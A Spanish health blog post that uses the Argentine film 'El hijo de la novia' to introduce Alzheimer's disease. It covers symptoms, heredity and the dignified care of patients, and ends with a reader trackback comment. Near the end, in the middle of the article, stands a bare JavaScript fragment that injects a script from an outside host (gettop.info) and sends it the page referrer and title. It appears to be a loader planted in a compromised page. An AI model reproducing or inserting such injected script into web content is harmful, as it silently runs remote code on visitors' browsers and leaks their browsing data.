Salud y belleza » Enfermedades

Radiografía de otro alemán malvado: Alzheimer I

1 Comentario

El talentoso cineasta argentino Juan José Campanella -gran protagonista en la entrega de los premios Oscars- es por éstas horas uno de los hombres más buscados y requeridos por la prensa universal.

Nosotros, desde éste espacio, tampoco hemos de esquivar la moda ni intentaremos hacer a un lado la demanda popular pero sí, en cambio, evitaremos subirnos al caballo del triunfo: ya hay muchas personas sobre el lomo de ese pobre rocín. De tal modo, nada se pronunciará aquí sobre la ganadora, “El Secreto de sus ojos”. Ya están avisados.

Pero, atención, no os confundáis pues esa determinación no empaña para nada las chances de resaltar virtud, talento y honor del gran Campanella, solo nos obliga a hurgar por otros rumbos. “El hijo de la novia”, es el nombre de esa ruta alternativa.

¿Y por qué un blog dedicado a la salud necesita hablar de aquel film que, para colmo, ni consiguió ganar un Oscar ni se encuentra hoy día en las salas de cine? Debido a una particular razón: no existe documento en el mundo capaz de dar mejor testimonio acerca de los efectos del mal Alzheimer sobre el espíritu humano que el presentado en aquella cinta rodada por el argentino.

La señora Belvedere (Norma Aleandro) podría ser vuestra madre, podría ser vuestra abuela o, quién sabe, tal vez vuestra esposa con la que te encuentras casados desde hace ya casi cuarenta años. Nada de eso importa, pues, a saber, el mal de Alzheimer -ese malvado Alemán que corre a todos de cerca- no discrimina: ataca “a dedo”.

La enfermedad de Alzheimer (EA), también denominada simplemente como el “mal de Alzheimer” o demencia senil de tipo Alzheimer (DSTA), es un trastorno neurodegenerativo que se manifiesta a través de un deterioro cognitivo, mediante trastornos conductuales. En la mayoría de los casos, esto significa una progresiva perdida de la memoria junto con otras capacidades mentales que transforman al sujeto.

“El Alzheimer es una enfermedad sumamente delicada y, a decir verdad, difícil de anticipar. Puede ser hereditaria, claro, pero también puede aparecer en personas con un árbol genealógico firme, sano. Las formas de revertir esta patología son casi nulas y a menudo se trata más de un ejercicio psicológico, más emocional que físico” relata un médico acostumbrado a tratar dificultades de éste tipo.

Con respecto al cuadro clínico, puede que éste resulte confuso y, al principio, llegué a ser confundido con los síntomas de la vejez. Pero, al aumentar los síntomas nombrados en los párrafos superiores, se puede determinar con facilidad la raíz del problema.

A saber: un enfermo de Alzheimer supone un reto para el círculo social cercano. Pero, bajo ningún punto de vista, se los debe subestimar ni tratar con violencia por más exasperante que sea la situación. Un paciente de éste tipo siente y responde a estímulos como otros individuos y, por ende, se los debe tratar con dignidad.

El día internacional del Alzheimer se celebra el 21 de septiembre, fecha elegida por la OMS y la Federación internacional de Alzheimer.

Más sobre el alzheimer

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Sobre el mal de Alzheimer said:

    [...] anteriores, desde este espacio se presentó un verdadero prolegómeno sobre el mal de Alzheimer [ver el articulo anterior sobre Alzheimer] . El mismo, a comparación con el articulo que se enseñará en esta ocasión, bien podría [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.